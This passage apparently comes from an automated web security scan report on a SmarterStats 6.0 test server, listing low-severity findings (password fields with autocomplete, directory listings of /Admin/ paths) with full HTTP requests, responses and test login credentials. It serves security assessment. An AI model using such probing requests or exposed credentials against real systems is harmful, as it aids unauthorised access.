Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1193026117","TopBarSection":"UserSettings"}
Content-Length: 951

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%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%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=1&ctl00%24MPH%24txtUserName=weirdo&ctl00%24MPH%24txtPassword=LL12345&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:55:32 GMT
X-AspNet-Version: 4.0.30319
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 00:55:32 GMT; path=/
Set-Cookie: loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; expires=Mon, 12-Oct-2020 00:55:32 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 40
Connection: Close

1|#||4|15|pageRedirect||%2fdefault.aspx|

7. Password field with autocomplete enabled
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?shortcutLink=autologin&txtSiteID=admin&txtUser=admin&txtPass=admin HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:28:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; path=/; HttpOnly
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:28:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8885



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx?shortcutLink=autologin&amp;txtSiteID=admin&amp;txtUser=admin&amp;txtPass=admin" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Site ID, username or password is incorrect.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="admin" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="admin" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


7.2. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:34:01 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8537



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


8. Directory listing
There are 73 instances of this issue:

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:


8.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/

Request

GET /Admin/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:19:57 GMT
Content-Length: 3653
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Defaults/">Defaults</A>
Thursday, October 07, 2010 01:00 PM 869 <A href="frmAllServiceStatus.aspx">frmAllServiceStatus.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,170 <A href="frmDiagnostics.aspx">frmDiagnostics.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,568 <A href="frmEmailReportSettings.aspx">frmEmailReportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,771 <A href="frmExtensionSettings.aspx">frmExtensionSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 4,357 <A href="frmGeneralSettings.aspx">frmGeneralSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,141 <A href="frmLicenseDetails.aspx">frmLicenseDetails.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,875 <A href="frmLicenseManager.aspx">frmLicenseManager.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,622 <A href="frmMoveSite.aspx">frmMoveSite.aspx</A>
Thursday, October 07, 2010 01:00 PM 783 <A href="frmReImport.aspx">frmReImport.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,503 <A href="frmReportSettings.aspx">frmReportSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 813 <A href="frmReprocessSite.aspx">frmReprocessSite.aspx</A>
Thursday, October 07, 2010 01:00 PM 3,689 <A href="frmSelfDiagnostic.aspx">frmSelfDiagnostic.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,790 <A href="frmServer.aspx">frmServer.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,214 <A href="frmServers.aspx">frmServers.aspx</A>
Thursday, October 07, 2010 01:00 PM 12,811 <A href="frmSite.aspx">frmSite.aspx</A>
Thursday, October 07, 2010 01:00 PM 5,812 <A href="frmSites.aspx">frmSites.aspx</A>
Thursday, October 07, 2010 01:00 PM 859 <A href="frmVersionInfo.aspx">frmVersionInfo.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,841 <A href="frmViewLogs.aspx">frmViewLogs.aspx</A>
Thursday, October 07, 2010 01:00 PM 5,651 <A href="frmViewReports.aspx">frmViewReports.aspx</A>
Thursday, October 07, 2010 01:00 PM 10,425 <A href="frmWelcome.aspx">frmWelcome.aspx</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="GettingStarted/">GettingStarted</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Popups/">Popups</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Defaults/

Request

GET /Admin/Defaults/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:20:05 GMT
Content-Length: 1719
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/Defaults/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/Defaults/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Admin/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,695 <A href="frmDefaultSiteSettings.aspx">frmDefaultSiteSettings.aspx</A>
Thursday, October 07, 2010 01:00 PM 886 <A href="frmServerDefaults.aspx">frmServerDefaults.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,446 <A href="frmServerPropagation.aspx">frmServerPropagation.aspx</A>
Thursday, October 07, 2010 01:00 PM 2,432 <A href="frmSitePropagation.aspx">frmSitePropagation.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/GettingStarted/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/GettingStarted/

Request

GET /Admin/GettingStarted/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:23:14 GMT
Content-Length: 1495
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /Admin/GettingStarted/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /Admin/GettingStarted/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/Admin/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,839 <A href="frmGettingStarted.aspx">frmGettingStarted.aspx</A>
